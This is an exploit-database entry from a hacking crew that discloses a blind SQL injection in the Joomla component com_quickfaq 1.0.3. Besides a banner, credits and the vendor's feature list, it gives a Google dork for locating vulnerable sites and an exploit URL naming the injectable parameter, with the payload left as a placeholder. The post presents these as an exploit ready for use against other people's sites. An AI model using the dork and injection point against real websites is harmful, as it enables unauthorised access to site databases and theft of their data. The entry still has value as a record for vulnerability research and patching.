Joomla Component com_quickfaq Blind SQL Injection Vulnerability

2010-07-09T00:00:00
ID 1337DAY-ID-13258
Type zdt
Reporter **RoAd_KiLlEr**
Modified 2010-07-09T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===============================================================
Joomla Component com_quickfaq Blind SQL Injection Vulnerability
===============================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                ###########################################           1
0               I'm **RoAd_KiLlEr**  member from Inj3ct0r Team         1
1                ###########################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


[+]Title                Joomla   Component  (com_quickfaq)  BSQL-i Vulnerability
[+]Author          **RoAd_KiLlEr**
[+]Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Home: http://inj3ct0r.com
[~] Vendor: http://www.schlu.net
[~] Download Application:http://www.schlu.net/downloads/16-component/77-quickfaq.html
[~] Version: 1.0.3
==========ExPl0iT3d by **RoAd_KiLlEr**==========
 
[+]Description:
QuickFAQ is an easy to use but powerful FAQ management system.
 
Feature List:
* Unlimited Subcategories
* Assign FAQ Items to multiple Categories
* Create Tags/Labels to flag FAQ Items
* Up/down voting of FAQ Items
* Favoure FAQ Items to maintain a personal bookmark list
* Document uploader/manager
* PDF creation of FAQ Items
* RTL support
* RSS/ATOM Feeds
* Detailed statistics
* JComments and JomComments integration
=========================================
 
[+] Dork: inurl:"com_quickfaq"
 
==========================================
 
 
[+].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+
 
[Exploit]:  http://127.0.0.1/path/index.php?option=com_quickfaq&view=category&cid=[Valid Cid]&Itemid= [BSQL-Injection]



#  0day.today [2018-01-04]  #